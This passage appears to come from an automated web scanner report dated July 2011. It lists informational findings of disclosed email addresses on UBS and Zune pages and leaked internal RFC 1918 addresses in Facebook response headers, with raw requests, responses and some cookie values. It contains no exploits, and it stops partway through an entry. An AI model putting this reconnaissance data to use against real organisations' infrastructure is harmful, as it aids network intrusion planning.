<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<a href="mailto:internetsecurity@ubs.com" target="_top">internetsecurity@ubs.com<!--Force all XSLT engines to generate an end tag.-->
...[SNIP]...

16.30. http://www.ubs.com/1/e/online/legal/data_source.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/online/legal/data_source.html

Issue detail

The following email address was disclosed in the response:

Request

GET /1/e/online/legal/data_source.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:13 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 111113
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 33
WipExpirationDate: July 6, 2011 16:16
Expires: Wed, 06 Jul 2011 14:16:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
ewsgroups, mail lists, electronic bulletin boards, or other services, without the prior written consent of Dow Jones or AWP. To request consent for this and other matters, you may contact Dow Jones at djnewswires@dowjones.com or AWP at verkauf@awp.ch.<br/>
...[SNIP]...

16.31. http://www.ubs.com/1/live/homepage/shared/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1/live/homepage/shared/jquery.cookie.js HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:02 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 12:11:34 GMT
Cache-Control: max-age=1880
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4341

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

16.32. http://www.zune.net/en-US/press/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a href="mailto:zunepress@edelman.com">zunepress@edelman.com</a>
...[SNIP]...

16.33. http://www.zune.net/en-us/newsletter/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a href="mailto:zune@e-mail.zune.net">zune@e-mail.zune.net</a>
...[SNIP]...

17. Private IP addresses disclosed
There are 18 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


17.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1646
Expires: Wed, 06 Jul 2011 11:47:57 GMT
Date: Wed, 06 Jul 2011 11:20:31 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

17.2. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.64.186
Cache-Control: public, max-age=253
Expires: Wed, 06 Jul 2011 14:11:00 GMT
Date: Wed, 06 Jul 2011 14:06:47 GMT
Content-Length: 2338
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

17.3. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y4/r/DhINBSBsTFQ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y4/r/DhINBSBsTFQ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Jul 2011 19:32:31 GMT
X-FB-Server: 10.138.69.184
Content-Length: 38947
Vary: Accept-Encoding
Cache-Control: public, max-age=31140498
Expires: Sat, 30 Jun 2012 21:26:53 GMT
Date: Wed, 06 Jul 2011 11:18:35 GMT
Connection: close

/*1309555663,176833976*/

body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embe
...[SNIP]...

17.4. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...

17.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.45.44
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 22

Invalid Application ID

17.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105884726134656&app_id=105884726134656&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313020f9c%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143104ab8%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24aa56e24%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fffad37%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c7a69384%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.45
X-Cnection: close
Date: Wed, 06 Jul 2011 11:22:08 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f1fffad37&origin=http\u00253A\u00252F\u00252Fwww.bebo.com\u00252Ff2847a9e74&relation=parent&transport=postmessage&frame=f2035863b4", "http:\/\/ww
...[SNIP]...

17.7. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...

17.8. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.139.39
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 6071

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...

17.9. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.49
X-Cnection: close
Date: Wed, 06 Jul 2011 11:16:07 GMT
Content-Length: 0


17.10. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.56.25
Connection: close
Date: Wed, 06 Jul 2011 14:07:34 GMT
Content-Length: 0


17.11. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.65
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0


17.12. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.252.30
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0


17.13. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&t=presspass+controls+-+Microsoft+Search HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fsearch.microsoft.com%2Fresults.aspx%3Fq%3Dpresspass+controls%26FORM%3DMSERRO%26mkt%3Den-US&t=presspass+controls+-+Microsoft+Search
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.254.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0


17.14. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.161.62
X-Cnection: close
Date: Wed, 06 Jul 2011 11:17:16 GMT
Content-Length: 0


17.15. http://www.facebook.com/sharer/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.39
Connection: close
Date: Wed, 06 Jul 2011 14:07:34 GMT
Content-Length: 0


17.16. http://www.facebook.com/sharer/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.163.35
X-Cnection: close
Date: Wed, 06 Jul 2011 11:15:22 GMT
Content-Length: 0


17.17. http://www.facebook.com/sharer/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
